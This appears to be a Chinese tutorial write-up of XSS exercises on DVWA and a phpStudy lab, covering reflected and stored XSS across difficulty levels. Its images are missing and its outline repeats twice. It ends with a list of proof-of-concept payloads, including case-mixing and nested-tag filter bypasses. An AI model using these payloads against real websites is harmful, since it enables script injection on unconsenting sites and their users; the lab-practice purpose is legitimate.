目录

小皮:

1.

2.这里需要登录,我们之前爆破出账号密码在这里就可以用​编辑

登录之后:​编辑

使用工具:

先输入正确字符进行测试:aaa

进行测试:

3.换种控制台显示

结果:(使用f12大法)

 DVWA:

反射型XSS:

低:

​编辑

中:大小写绕过:

​编辑

也可以双写绕过:

​编辑

高:

​编辑

存储型XSS:

低:

中:

​编辑

高:

---

小皮:

1.

2.这里需要登录,我们之前爆破出账号密码在这里就可以用

登录之后:

使用工具:

先输入正确字符进行测试:aaa

进行测试:

3.换种控制台显示

结果:(使用f12大法)

 DVWA:

反射型XSS:

低:

中:大小写绕过:

也可以双写绕过:

高:

存储型XSS:

低:

上下均可执行,name需要修改前端代码

a标签也可以

中:

这里可以测试出name是存在xss的,message没有

高:

结果大家可以自己动手操作一下

彩蛋:

<script>alert(1);</script>
<s<script>cript>alert(1);</script>
<Sc<ScRipt>Ript>alert(1);</script>
<script>console.log('123');</script>
<body onload=alert(1)>
<a href="javascript:alert(1)">test</a>